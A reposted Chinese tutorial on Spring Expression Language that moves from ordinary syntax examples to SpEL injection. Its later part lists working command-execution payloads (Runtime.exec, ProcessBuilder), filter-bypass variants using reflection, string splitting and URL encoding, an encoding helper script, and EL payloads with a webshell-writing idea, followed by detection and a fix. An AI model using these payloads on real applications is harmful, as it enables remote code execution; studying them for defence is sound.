热门标签
热门文章
- 1vim打造自己的go IDE_nvim搭建go ide
- 2初步认识ul(无序列表)和ol(有序列表)_ul和ol
- 3pytorch初学笔记(六):DataLoader的使用_pytorch dataloader
- 4vue nuxt网站设置黑夜 白天模式切换 自动识别系统主题色变化_window.matchmedia("(prefers-color-scheme: dark)").
- 5重学前端 详解列表(list-style-type list-style-position 自定义列表 dl list-style-image list-style li的源css)(第五天)
- 6时域特征提取_PHM建模方法论之 数据特征提取
- 73. epipolar geometry 【cs231a课程笔记】_stereo: epipolar geometry
- 8Unity资源格式详解与自动化设置_unity format automatic
- 9使用R语言的file_move函数将指定文件从一个位置拷贝到另一个位置_r语言 文件转移
- 10云计算和大数据技术
当前位置: article > 正文
浅入深SpEL表达式注入漏洞总结_spring spel表达式注入
作者:羊村懒王 | 2024-03-25 10:58:46
赞
踩
spring spel表达式注入
SpEL 简介
在Spring 3 中引入了 Spring 表达式语言 (Spring Expression Language,简称SpEL),
这是一种功能强大的表达式语言,支持在运行时查询和操作对象图,可以与基于XML和基于注解的Spring配置还有bean定义一起使用。
在Spring系列产品中,SpEL是表达式计算的基础,实现了与Spring生态系统所有产品无缝对接。Spring框架的核心功能之一就是通过依赖注入的方式来管理Bean之间的依赖关系,而SpEL可以方便快捷的对ApplicationContext中的Bean进行属性的装配和提取。由于它能够在运行时动态分配值,因此可以为我们节省大量Java代码。
SpEL特性:
- 使用Bean的ID来引用Bean
- 可调用方法和访问对象的属性
- 可对值进行算数、关系和逻辑运算
- 可使用正则表达式进行匹配
- 可进行集合操作
SpEL 定界符 #{}
SpEL 使用 #{ } 作为定界符 ,所有在打括号中的字符都被认为表达式,在其中可以使用 SpEL 运算符 变量 引用 以及属性和方法等。
# { } 和 $ { } 的区别:
- # { } 就是SpEL 的定界符,用于指明内容 spel 表达式并执行;
- $ { } 主要用于
- 两者可以混合使用,但是必须 # { } 在外面,${ } 在里面,如,注意单引号是字符串类型才添加的
#{'${}'}
Spel 表达式类型
字面值
最简单的Spel 表达式就是仅包含一个字面值 ,此时需要用到 # { } 定界符,注意若是指定为字符串的话 需要添加单引号括起来
- <property name="message1" value="#{666}"/>
- <property name="message2" value="#{'mi1k7ea'}"/>
还可以直接与字符串混用:
<property name="message" value="the value is #{666}"/>
Java基本数据类型都可以出现在SpEL表达式中,表达式中的数字也可以使用科学计数法:
<property name="salary" value="#{1e4}"/>演示
直接用Spring 的 HelloWorld 例子:
你好世界.java:
- public class HelloWorld {
- private String message;
-
- public void setMessage(String message){
- this.message = message;
- }
-
- public void getMessage(){
- System.out.println("Your Message : " + message);
- }
- }
主应用.java:
- import com.mi1k7ea.service.AccountService;
- import org.springframework.context.ApplicationContext;
- import org.springframework.context.support.ClassPathXmlApplicationContext;
-
- public class MainApp {
- public static void main(String[] args) {
- ApplicationContext context = new ClassPathXmlApplicationContext("Beans.xml");
- HelloWorld obj = (HelloWorld) context.getBean("helloWorld");
- obj.getMessage();
- }
- }
Beans.xml
- <beans xmlns="http://www.springframework.org/schema/beans"
- xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
- xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
- <bean id="helloWorld" class="Spel.HelloWorld">
- <property name="message" value="#{'snowy'} is #{1e7}" />
- </bean>
-
- </beans>
运行结果:
Your Message : snowy is 1.0E7引用Bean、属性和方法
引用 Bean
SpeL 表达式能够通过其他Bean的ID 进行引用,直接在 # { } 符号中写入ID 名即可,无需添加单引号括起来。 如:
- <!--原来的写法,通过构造函数实现依赖注入-->
- <!--<constructor-arg ref="test"/>-->
- <constructor-arg value="#{test}"/>
引用类属性
SpEL 表达式能够访问类的属性
比如,carl参赛者是一位模仿高手,kenny唱什么歌,弹奏什么乐器,他就唱什么歌,弹奏什么乐器:
- <bean id="kenny" class="com.spring.entity.Instrumentalist"
- p:song="May Rain"
- p:instrument-ref="piano"/>
- <bean id="carl" class="com.spring.entity.Instrumentalist">
- <property name="instrument" value="#{kenny.instrument}"/>
- <property name="song" value="#{kenny.song}"/>
- </bean>
相当于 执行了:
- >Instrumentalist carl = new Instrumentalist();
- >carl.setSong(kenny.getSong());
引用类方法:
SpEL 表达式还可以访问类的方法:
如现在有个SongSelector 类,该类有个 selectSong() 方法,这样的话 carl 不需要模仿别人,直接开始吟唱 songSelector 所选的歌了
> <property name="song" value="#{SongSelector.selectSong()}"/>
carl 有个癖好 , 歌曲名不是大写的,他就浑身难受,我们需要做的就是为他返回的歌曲调用toUpperCase() 方法
<property name="song" value="#{SongSelector.selectSong().toUpperCase()}"/>
注意:这里我们不能确保不抛出 NullPointerException,,为了避免这个讨厌的问题,我们可以使用SpEL 的null - safe 存取器
<property name="song" value="#{SongSelector.selectSong()?.toUpperCase()}"/>
? . 符号 会确保左边的表达式不会为 null ,如果为null 的话 就不会调用 toUpperCase()方法
Demo -- 引用Bean
这里修改基于构造函数的依赖注入的实例:
SpellChecker.java:
- public class SpellChecker {
- public SpellChecker(){
- System.out.println("Inside SpellChecker constructor." );
- }
- public void checkSpelling() {
- System.out.println("Inside checkSpelling." );
- }
- }
TextEditor.java:
- public class TextEditor {
- private SpellChecker spellChecker;
- public TextEditor(SpellChecker spellChecker) {
- System.out.println("Inside TextEditor constructor." );
- this.spellChecker = spellChecker;
- }
- public void spellCheck() {
- spellChecker.checkSpelling();
- }
- }
MainApp.java:
- import org.springframework.context.ApplicationContext;
- import org.springframework.context.support.ClassPathXmlApplicationContext;
-
- public class MainApp {
- public static void main(String[] args) {
- ApplicationContext context = new ClassPathXmlApplicationContext("Beans.xml");
- TextEditor te = (TextEditor) context.getBean("textEditor");
- te.spellCheck();
- }
- }
Beans.xml,通过的方式替换掉之前的ref属性设置value="#{bean id}"
- <beans xmlns="http://www.springframework.org/schema/beans"
- xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
- xsi:schemaLocation="http://www.springframework.org/schema/beans
- http://www.springframework.org/schema/beans/spring-beans-3.0.xsd ">
-
- <!-- Definition for textEditor bean -->
- <bean id="textEditor" class="com.mi1k7ea.TextEditor">
- <!--<constructor-arg ref="spellChecker"/>-->
- <constructor-arg value="#{spellChecker}"/>
- </bean>
-
- <!-- Definition for spellChecker bean -->
- <bean id="spellChecker" class="com.mi1k7ea.SpellChecker" />
-
- </beans>
运行输出结果:
- Inside SpellChecker constructor.
- Inside TextEditor constructor.
- Inside checkSpelling.
类类型表达式 T (Type)
在SpEL表达式中,使用 T(Type) 运算符会调用类的 作用域和方法,换句话说,就是可以通过该类类型表达式 来操作类。
使用 T(Type) 来表示 java.lang.Class 实例,Type 必须是类全限定名,但 "java.lang" 包除外, 因为 SpEL 已经内置了该包,即该包下的类可以不指定具体的包名; 使用类类型表达式还可以进行访问类静态方法 和 类静态字段。
在XML 配置文件中的使用实例,要调用java.lang.Math 来获取0~1 的随机数:
<property name="random" value="#{T(java.lang.Math).random()}"/>
Expression(表达式)中使用示例:
- ExpressionParser parser = new SpelExpressionParser();
- // java.lang 包类访问
- Class<String> result1 = parser.parseExpression("T(String)").getValue(Class.class);
- System.out.println(result1);
- //其他包类访问
- String expression2 = "T(java.lang.Runtime).getRuntime().exec('open /Applications/Calculator.app')";
- Class<Object> result2 = parser.parseExpression(expression2).getValue(Class.class);
- System.out.println(result2);
- //类静态字段访问
- int result3 = parser.parseExpression("T(Integer).MAX_VALUE").getValue(int.class);
- System.out.println(result3);
- //类静态方法调用
- int result4 = parser.parseExpression("T(Integer).parseInt('1')").getValue(int.class);
- System.out.println(result4)
DEMO
在前面字面值的 Demo中修改 Beans.xml 即可:
- <?xml version="1.0" encoding="UTF-8"?>
- <beans xmlns="http://www.springframework.org/schema/beans"
- xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
- xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
-
-
- <bean id ="hello" class="Spel.eztest.HelloWorld">
- <property name="message" value="#{T(java.lang.Math)?.random() }"/>
- </bean>
-
- </beans>
输出结果:
Your Message : 0.23296371273385708恶意利用 ————弹计算器
修改其 value中 类类型表达式的类为 RUntime 并调用其执行方法即可:
- <?xml version="1.0" encoding="UTF-8"?>
- <beans xmlns="http://www.springframework.org/schema/beans"
- xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
- xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
-
-
- <bean id ="hello" class="Spel.eztest.HelloWorld">
- <property name="message" value="#{T(Runtime).getRuntime().exec('calc')}"/>
- </bean>
-
- </beans>
运行 就弹出计算器。
SpEL 用法
SpEL 的用法有三种形式,一种是在注解 @Value 中; 一种是XML 配置;最后一种是在代码块中使用Expression
前面的就是以XML配置为例 对SpEL 表达式的用法进行的说明,而注解@Value 的用法例子如下:
- public class EmailSender {
- @Value("${spring.mail.username}")
- private String mailUsername;
- @Value("#{ systemProperties['user.region'] }")
- private String defaultLocale;
- //...
- }
Expression用法
由于后续分析各种 Spring VCVE漏洞都是基于 Expression 形式的 SPEL 表达式注入,因此这里再单独说明SpEL 表达式 Expression形式用法
步骤
SpEL 在求表达式值时一般分为四步,其中第三步可选:首先构造一个解析器,其次解析器解析字符串表达式,在此构造上下文,最后根据上下文得到表达式运算后的值。
- ExpressionParser parser = new SpelExpressionParser();
- Expression expression = parser.parseExpression("('Hello' + ' Mi1k7ea').concat(#end)");
- EvaluationContext context = new StandardEvaluationContext();
- context.setVariable("end", "!");
- System.out.println(expression.getValue(context));
具体步骤如下:
- 创建解析器:SpEL 使用 ExpressionParser 接口表示解析器,提供 SpelExpressionParser 默认实现;
- 解析表达式:使用 ExpressionParser 的 parseExpression 来解析相应的表达式为 Expression 对象;
- 构造上下文:准备比如变量定义等等表达式需要的上下文数据;
- 求值:通过 Expression 接口的 getValue 方法根据上下文获得表达式值;
主要接口
- ExpressionParser 接口:表示解析器,默认实现是 org.springframework.expression.spel.standard 包中的 SpelExpressionParser 类,使用 parseExpression 方法将字符串表达式转换为 Expression 对象,对于 ParserContext 接口用于定义字符串表达式是不是模板,及模板开始与结束字符;
- EvaluationContext 接口:表示上下文环境,默认实现是 org.springframework.expression.spel.support 包中的 StandardEvaluationContext 类,使用 setRootObject 方法来设置根对象,使用 setVariable 方法来注册自定义变量,使用 registerFunction 来注册自定义函数等等。
- Expression 接口:表示表达式对象,默认实现是 org.springframework.expression.spel.standard 包中的 SpelExpression,提供 getValue 方法用于获取表达式值,提供 setValue 方法用于设置对象值。
Demo
应用实例如下,和前面XML 配置的用法区别在于程序会将这里传入 parseExpression() 函数的字符串参数 当SpEL 表达式来解析,而无需通过 #{ } 符号来注明:
- public class ExpressionTest {
- public static void main(String[] args) {
-
- // 字符串字面量
- //String spel = "123+456";
- // 算数运算
- //String spel = "123+456";
- // 操作类弹计算器,当然java.lang包下的类是可以省略包名的
- String spel = "T(java.lang.Runtime).getRuntime().exec(\"calc\")";
- // String spel = "T(java.lang.Runtime).getRuntime().exec(\"calc\")";
- ExpressionParser parser = new SpelExpressionParser(); //spel解析器
- Expression expression = parser.parseExpression(spel); //解析表达式
- System.out.println(expression.getValue()); //取值
- }
- }
类实例化
类实例化同样使用JAVA关键字new ,类名必须是全限定名,但java.lang包内的类型除外
- String spel = "new java.util.Date()";
- ExpressionParser parser = new SpelExpressionParser();
- Expression expression = parser.parseExpression(spel);
- System.out.println(expression.getValue());
SpEL 表达式运算
引用自 SpEL表达式 | MrBird
SpEL 提供了以下几种运算符:
| 运算符类型 | 运算符 |
| 算数运算 | +, -, *, /, %, ^ |
| 关系运算 | <, >, ==, <=, >=, lt, gt, eq, le, ge |
| 逻辑运算 | and, or, not, ! |
| 条件运算 | ?:(ternary), ?:(Elvis) |
| 正则表达式 | matches |
算数运算:
<property name="add" value="#{counter.total+42}"/>加号还可以用于字符串拼接:
<property name="blogName" value="#{my blog name is+' '+mrBird }"/>
^ 运算符 执行幂运算,其余和java一样
关系运算:
判断一个 Bean 的某个 属性是否等于 100:
<property name="eq" value="#{counter.total==100}"/>返回值是boolean类型。关系运算符唯一需要注意的是:在Spring XML配置文件中直接写>=和<=会报错。因为这”<”和”>”两个符号在XML中有特殊的含义。所以实际使用时,最号使用文本类型代替符号
| 运算符 | 符号 | 文本类型 |
|---|---|---|
| 等于 | == | eq |
| 小于 | < | lt |
| 小于等于 | <= | le |
| 大于 | > | gt |
| 大于等于 | >= | ge |
如:
<property name="eq" value="#{counter.total le 100}"/>逻辑运算
SpEL 表达式提供了多种逻辑运算符,其含义和JAVA一样 只不过符号不一样
使用and 运算符:
<property name="largeCircle" value="#{shape.kind == 'circle' and shape.perimeter gt 10000}"/>两边为true 时才返回true
其余操作一样,只不过非运算有 not 和 ! 两种符号可供选择,非运算 :
<property name="outOfStack" value="#{!product.available}"/>条件运算
条件运算符 类似于 JAVA的三目运算符:
<property name="instrument" value="#{songSelector.selectSong() == 'May Rain' ? piano:saxphone}"/>当选择的歌曲为”May Rain”的时候,一个id为piano的Bean将装配到instrument属性中,否则一个id为saxophone的Bean将装配到instrument属性中。注意区别piano和字符串“piano”!
一个常见的三目运算符的使用场合是判断是否为null值:
<property name="song" value="#{kenny.song !=null ? kenny.song:'Jingle Bells'}"/>
这里, kenny.song 引用重复了两次,SpEL 提供了三目运算符的变体来简化表达式:
<property name="song" value="#{kenny.song !=null ?:'Jingle Bells'}"/>
在以上示例中, 如果 kenny.song 不为null ,那么表达式的求值结果是kenny.song 否则就是 'Jingle Bells' 。
正则表达式
验证邮箱:
<property name="email" value="#{admin.email matches '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.com'}"/>
集合操作
SpEL 表达式支持对集合进行操作。
创建一个 City类:
- public class City {
- private String name;
- private String state;
- private int population;
- public String getName() {
- return name;
- }
- public void setName(String name) {
- this.name = name;
- }
- public String getState() {
- return state;
- }
- public void setState(String state) {
- this.state = state;
- }
- public int getPopulation() {
- return population;
- }
- public void setPopulation(int population) {
- this.population = population;
- }
- }
修改Beans.xml,使用<util:list>元素配置一个包含City对象的List集合:
- <beans xmlns="http://www.springframework.org/schema/beans"
- xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
- xmlns:p="http://www.springframework.org/schema/p"
- xmlns:util="http://www.springframework.org/schema/util"
- xsi:schemaLocation="http://www.springframework.org/schema/beans
- http://www.springframework.org/schema/beans/spring-beans-3.0.xsd
- http://www.springframework.org/schema/util
- http://www.springframework.org/schema/util/spring-util-4.0.xsd">
-
- <util:list id="cities">
- <bean class="com.mi1k7ea.City" p:name="Chicago"
- p:state="IL" p:population="2853114"/>
- <bean class="com.mi1k7ea.City" p:name="Atlanta"
- p:state="GA" p:population="537958"/>
- <bean class="com.mi1k7ea.City" p:name="Dallas"
- p:state="TX" p:population="1279910"/>
- <bean class="com.mi1k7ea.City" p:name="Houston"
- p:state="TX" p:population="2242193"/>
- <bean class="com.mi1k7ea.City" p:name="Odessa"
- p:state="TX" p:population="90943"/>
- <bean class="com.mi1k7ea.City" p:name="El Paso"
- p:state="TX" p:population="613190"/>
- <bean class="com.mi1k7ea.City" p:name="Jal"
- p:state="NM" p:population="1996"/>
- <bean class="com.mi1k7ea.City" p:name="Las Cruces"
- p:state="NM" p:population="91865"/>
- </util:list>
-
- </beans>
访问集合成员:
SpEL表达式支持通过#{集合ID[i]}的方式来访问集合中的成员。
定义一个ChoseCity类:
- <bean id="choseCity" class="com.mi1k7ea.ChoseCity">
- <property name="city" value="#{cities[0]}"/>
- </bean>
MainApp.java,实例化这个Bean:
- import org.springframework.context.ApplicationContext;
- import org.springframework.context.support.ClassPathXmlApplicationContext;
-
- public class MainApp {
- public static void main(String[] args) {
- ApplicationContext context = new ClassPathXmlApplicationContext("Beans.xml");
- ChoseCity c = (ChoseCity)context.getBean("choseCity");
- System.out.println(c.getCity().getName());
- }
- }
运行无误则输出 "Chicago"
随意的选择一个city , 中括号 [ ] 运算始终通过索引访问集合中的成员
<property name="city" value="#{cities[T(java.lang.Math).random()*cities.size()]}"/>
此时会随机访问一个集合成员并输出。
查询集合成员
SpEL表达式中提供了查询运算符来实现查询符合条件的集合成员:
.?[]:返回所有符合条件的集合成员;.^[]:从集合查询中查出第一个符合条件的集合成员;.$[]:从集合查询中查出最后一个符合条件的集合成员;
修改ChoseCity类,将city属性类型改为City列表类型:
- import java.util.List;
-
- public class ChoseCity {
- private List<City> city;
-
- public List<City> getCity() {
- return city;
- }
- public void setCity(List<City> city) {
- this.city = city;
- }
- }
修改Beans.xml:
- <bean id="choseCity" class="com.mi1k7ea.ChoseCity">
- <property name="city" value="#{cities.?[population gt 100000]}"/>
- </bean>
修改MainApp.java:
- import org.springframework.context.ApplicationContext;
- import org.springframework.context.support.ClassPathXmlApplicationContext;
-
- public class MainApp {
- public static void main(String[] args) {
- ApplicationContext context = new ClassPathXmlApplicationContext("Beans.xml");
- ChoseCity c = (ChoseCity)context.getBean("choseCity");
- for(City city:c.getCity()){
- System.out.println(city.getName());
- }
- }
- }
运行输出:
- Chicago
- Atlanta
- Dallas
- Houston
- El Paso
变量定义和引用
在SpEL表达式中,变量定义通过EvaluationContext类的setVariable(variableName, value)函数来实现;在表达式中使用”#variableName”来引用;除了引用自定义变量,SpEL还允许引用根对象及当前上下文对象:
#this:使用当前正在计算的上下文;#root:引用容器的root对象;
示例,使用setVariable()函数定义了名为variable的变量,并且通过#variable来引用,同时尝试引用根对象和上下文对象:
- ExpressionParser parser = new SpelExpressionParser();
- EvaluationContext context = new StandardEvaluationContext("snowy");
- context.setVariable("variable", "666");
- String result1 = parser.parseExpression("#variable").getValue(context, String.class);
- System.out.println(result1);
- String result2 = parser.parseExpression("#root").getValue(context, String.class);
- System.out.println(result2);
- String result3 = parser.parseExpression("#this").getValue(context, String.class);
- System.out.println(result3);
输出:
- 666
- snowy
- snowy
SpEL表达式注入漏洞
漏洞原理
SimpleEvaluationContext和StandardEvaluationContext是SpEL提供的两个EvaluationContext:
- SimpleEvaluationContext - 针对不需要SpEL语言语法的全部范围并且应该受到有意限制的表达式类别,公开SpEL语言特性和配置选项的子集。
- StandardEvaluationContext - 公开全套SpEL语言功能和配置选项。您可以使用它来指定默认的根对象并配置每个可用的评估相关策略。
SimpleEvaluationContext旨在仅支持SpEL语言语法的一个子集,不包括 Java类型引用、构造函数和bean引用;而StandardEvaluationContext是支持全部SpEL语法的。
由前面知道,SpEL表达式是可以操作类及其方法的,可以通过类类型表达式T(Type)来调用任意类方法。这是因为在不指定EvaluationContext的情况下默认采用的是StandardEvaluationContext,而它包含了SpEL的所有功能,在允许用户控制输入的情况下可以成功造成任意命令执行。
如下,前面的例子中已提过:
- import org.springframework.expression.Expression;
- import org.springframework.expression.ExpressionParser;
- import org.springframework.expression.spel.standard.SpelExpressionParser;
-
- public class MainApp {
- public static void main(String[] args) throws Exception {
- String spel = "T(java.lang.Runtime).getRuntime().exec(\"calc\")";
- ExpressionParser parser = new SpelExpressionParser();
- Expression expression = parser.parseExpression(spel);
- System.out.println(expression.getValue());
- }
- }
POC &Bypass
- // PoC原型
-
- // Runtime
- T(java.lang.Runtime).getRuntime().exec("calc")
- T(Runtime).getRuntime().exec("calc")
-
- // ProcessBuilder
- new java.lang.ProcessBuilder({'calc'}).start()
- new ProcessBuilder({'calc'}).start()
-
- ******************************************************************************
- // Bypass技巧
-
- // 反射调用
- T(String).getClass().forName("java.lang.Runtime").getRuntime().exec("calc")
-
- // 同上,需要有上下文环境
- #this.getClass().forName("java.lang.Runtime").getRuntime().exec("calc")
-
- // 反射调用+字符串拼接,绕过如javacon题目中的正则过滤
- T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("ex"+"ec",T(String[])).invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime")),new String[]{"cmd","/C","calc"})
-
- // 同上,需要有上下文环境
- #this.getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("ex"+"ec",T(String[])).invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime")),new String[]{"cmd","/C","calc"})
-
- // 当执行的系统命令被过滤或者被URL编码掉时,可以通过String类动态生成字符,Part1
- // byte数组内容的生成后面有脚本
- new java.lang.ProcessBuilder(new java.lang.String(new byte[]{99,97,108,99})).start()
-
- // 当执行的系统命令被过滤或者被URL编码掉时,可以通过String类动态生成字符,Part2
- // byte数组内容的生成后面有脚本
- T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(108)).concat(T(java.lang.Character).toString(99)))
-
- // JavaScript引擎通用PoC
- T(javax.script.ScriptEngineManager).newInstance().getEngineByName("nashorn").eval("s=[3];s[0]='cmd';s[1]='/C';s[2]='calc';java.la"+"ng.Run"+"time.getRu"+"ntime().ex"+"ec(s);")
-
- T(org.springframework.util.StreamUtils).copy(T(javax.script.ScriptEngineManager).newInstance().getEngineByName("JavaScript").eval("xxx"),)
-
- // JavaScript引擎+反射调用
- T(org.springframework.util.StreamUtils).copy(T(javax.script.ScriptEngineManager).newInstance().getEngineByName("JavaScript").eval(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("ex"+"ec",T(String[])).invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime")),new String[]{"cmd","/C","calc"})),)
-
- // JavaScript引擎+URL编码
- // 其中URL编码内容为:
- // 不加最后的getInputStream()也行,因为弹计算器不需要回显
- T(org.springframework.util.StreamUtils).copy(T(javax.script.ScriptEngineManager).newInstance().getEngineByName("JavaScript").eval(T(java.net.URLDecoder).decode("%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%63%61%6c%63%22%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29")),)
-
- // 黑名单过滤".getClass(",可利用数组的方式绕过,还未测试成功
- ''['class'].forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(''['class'].forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),'calc')
-
- // JDK9新增的shell,还未测试
- T(SomeWhitelistedClassNotPartOfJDK).ClassLoader.loadClass("jdk.jshell.JShell",true).Methods[6].invoke(null,{}).eval('whatever java code in one statement').toString()
CreateAscii.py,用于String类动态生成字符的字符ASCII码转换生成:
- message = input('Enter message to encode:')
-
- print('Decoded string (in ASCII):\n')
-
- print('T(java.lang.Character).toString(%s)' % ord(message[0]), end="")
- for ch in message[1:]:
- print('.concat(T(java.lang.Character).toString(%s))' % ord(ch), end=""),
- print('\n')
-
- print('new java.lang.String(new byte[]{', end=""),
- print(ord(message[0]), end="")
- for ch in message[1:]:
- print(',%s' % ord(ch), end=""),
- print(')}')
其他的一些payload:
- // 转自:https://www.jianshu.com/p/ce4ac733a4b9
-
- ${pageContext} 对应于JSP页面中的pageContext对象(注意:取的是pageContext对象。)
-
- ${pageContext.getSession().getServletContext().getClassLoader().getResource("")} 获取web路径
-
- ${header} 文件头参数
-
- ${applicationScope} 获取webRoot
-
- ${pageContext.request.getSession().setAttribute("a",pageContext.request.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("命令").getInputStream())} 执行命令
-
-
- // 渗透思路:获取webroot路径,exec执行命令echo写入一句话。
-
- <p th:text="${#this.getClass().forName('java.lang.System').getProperty('user.dir')}"></p> //获取web路径
检测与防御
检测方法
全局搜索关键特征:
- //关键类
- org.springframework.expression.Expression
- org.springframework.expression.ExpressionParser
- org.springframework.expression.spel.standard.SpelExpressionParser
-
- //调用特征
- ExpressionParser parser = new SpelExpressionParser();
- Expression expression = parser.parseExpression(str);
- expression.getValue()
- expression.setValue()
防御方法
最直接的修复方法是使用SimpleEvaluationContext替换StandardEvaluationContext。
Demo:
- String spel = "T(java.lang.Runtime).getRuntime().exec(\"calc\")";
- ExpressionParser parser = new SpelExpressionParser();
- Student student = new Student();
- EvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().withRootObject(student).build();
- Expression expression = parser.parseExpression(spel);
- System.out.println(expression.getValue(context));
转自
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/羊村懒王/article/detail/309230
推荐阅读
相关标签
